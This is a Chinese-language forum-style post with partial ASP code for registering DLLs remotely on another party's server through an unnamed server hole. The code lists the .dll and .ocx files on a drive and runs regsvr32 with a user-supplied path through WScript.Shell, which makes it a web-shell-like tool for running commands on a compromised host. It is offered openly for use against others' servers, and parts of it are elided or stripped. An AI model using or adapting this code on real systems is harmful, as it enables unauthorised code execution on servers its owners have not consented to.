利用对方服务器漏洞远程注册DLL |
我和朋友一起下载了一个相同的组件,苦于无法注册而没用,但最近我发现他在使用这个组件,显然是已经注册了,好奇怪,他是怎么注册的呢?我问他他不说。 其实,我们在ASP中,是有捷径远程注册DLL的,但需要对方服务器漏洞的“配合”(什么漏洞?我可什么都没说啊,自己看)。试试下面的代码,或许侥幸成功呢: <% Response.Buffer = True %> <% Server.ScriptTimeout = 500 Dim frmFolderPath, frmFilePath frmFolderPath = Request.Form("frmFolderPath") frmFilePath = Request.Form("frmDllPath") frmMethod = Request.Form("frmMethod") btnREG = Request.Form("btnREG") %> <% Class clsRegister Private m_oFS Public Property Let oFS(objOFS) m_oFS = objOFS End Property …… Sub init(strRoot) 'Root to Search (c:, d:, e:) Dim oDrive, oRootDir IF oFS.FolderExists(strRoot) Then IF Len(strRoot) < 3 Then 'Must Be a Drive Set oDrive = oFS.GetDrive(strRoot) Set oRootDir = oDrive.RootFolder Else Set oRootDir = oFS.GetFolder(strRoot) End IF Else EchoB("噢,文件夹( " & strRoot & " )没找到!") Exit Sub End IF setRoot = oRootDir Echo("") BuildOptions End Sub Sub getAllDlls(oParentFolder) Dim oSubFolders, oFile, oFiles Set oSubFolders = oParentFolder.SubFolders Set opFiles = oParentFolder.Files For Each oFile in opFiles IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then Echo("") End IF Next On Error Resume Next For Each oFolder In oSubFolders 'Iterate All Folders in Drive Set oFiles = oFolder.Files For Each oFile in oFiles IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then Echo("") End IF Next Call getAllDlls(oFolder) Next On Error GoTo 0 End Sub Sub Register(strFilePath, regMethod) Dim theFile, strFile, oShell, exitcode Set theFile = oFS.GetFile(strFilePath) strFile = theFile.Path Set oShell = CreateObject ("WScript.Shell") IF regMethod = "REG" Then 'Register oShell.Run "c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False) EchoB("regsvr32.exe exitcode = " & exitcode) Else 'unRegister oShell.Run "c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False) EchoB("regsvr32.exe exitcode = " & exitcode) End IF Cleanup oShell End Sub Sub BuildOptions EchoB("Register: ") EchoB("unRegister: ") End Sub Function Echo(str) Echo = Response.Write(str & vbCrLf) End Function Function EchoB(str) EchoB = Response.Write(str & " " & vbCrLf) End Function Sub Cleanup(obj) If isObject(obj) Then Set obj = Nothing End IF End Sub Sub Class_Terminate() Cleanup oFS End Sub End Class %> ---- 最好的答案: http://www.huachu.com.cn/itbook/itbookinfo.asp?lbbh=BD04605180 http://www.waterpub.com.cn/sale/result.asp?id=5301 最好的介绍: http://www.intels.net/ ---- Internet是第一生产力; 网站建设是它的核心; ASP 就是网站的灵魂。 ---- 《ASP与相关数据库技术高级指南》[ASP的专家] |
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